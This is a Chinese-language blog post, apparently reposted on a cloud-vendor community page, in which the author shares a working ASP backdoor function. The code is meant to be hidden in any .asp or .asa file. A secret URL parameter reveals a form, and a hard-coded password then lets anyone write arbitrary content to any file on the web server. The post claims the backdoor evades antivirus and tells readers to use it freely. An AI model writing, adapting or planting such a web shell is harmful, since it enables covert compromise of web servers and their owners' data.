寫了一個ASP的後門函數

來源:互聯網
上載者:User

 

      我跟喜歡叫它瑞士軍刀,這段函數可以插入任何.ASP檔案和.ASA檔案。只要在地址中加上IID=2006,2006是我上大學的年份哦。

     個人認為asp的漏洞其實不多的,為什麼網路上說ASP漏洞多,本人認為是由於.ASP研究的人比任何一種WEB語言多的多,不是同一數量級上的概念,所以研究的人多了,也就暴露其問題了,這個沒什麼好說的是吧?

    這段還是其實是一段上傳函數,一般的Web Hacker都比較瞭解。中國管他加小馬,外國管他叫Back Door。其實一個道理了。

    代碼如下:

<%<br />DoorForm()<br />pwd()<br />function DoorForm()<br />dim iid<br />iid = request("iid")<br />if iid= 2006 then<br />response.write "<form method='post' action='?action=set&door=fine'>" &_<br />"<label></label>" &_<br />"<label>" &_<br />"<textarea name='Text' cols='50' rows='10' id='Text'>寫入內容" &_<br />"</textarea>" &_<br />"<br />" &_<br />"<br />" &_<br />"<input name='FileName' type='text' id='FileName' value='檔案名稱' size='52' maxlength='50' />" &_<br />"<br />" &_<br />"<br />" &_<br />"<input name='Pass' type='password' id='Pass' value='xxxxxxxxxxxxxxxxxxxxxx' size='52' maxlength='50' />" &_<br />"<br />" &_<br />"<br />" &_<br />"</label>" &_<br />"<label>" &_<br />"<input type='submit' name='Submit' value='儲存' />" &_<br />"</label>" &_<br />"</form>"<br />end if<br />end function<br />%><br /><%<br />function pwd()<br />dim door<br />door=request("pwd")<br />if door="fine" then<br />dim samllbad,pass<br />pass="fish"<br />if request("action")="set" then<br />if request("pass")=pass then<br />Text=request("Text")<br />FileName=request("FileName")<br />set fs=server.CreateObject("Scripting.FileSystemObject")<br />set file=fs.OpenTextFile(server.MapPath(FileName),8,True)<br />file.writeline Text<br />file.close<br />set file=nothing<br />set fs=nothing<br />response.write ("儲存成功!")<br />end if<br />else<br />response.write ("密碼錯誤!")<br />end if<br />end if<br />end function<br />%><br />

     還有我告訴大家,我不寫大馬,是因為等你看到的時候,這個已經是一堆垃圾代碼了。以上這個函數是不會被殺毒軟體查殺的,請放心使用。

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.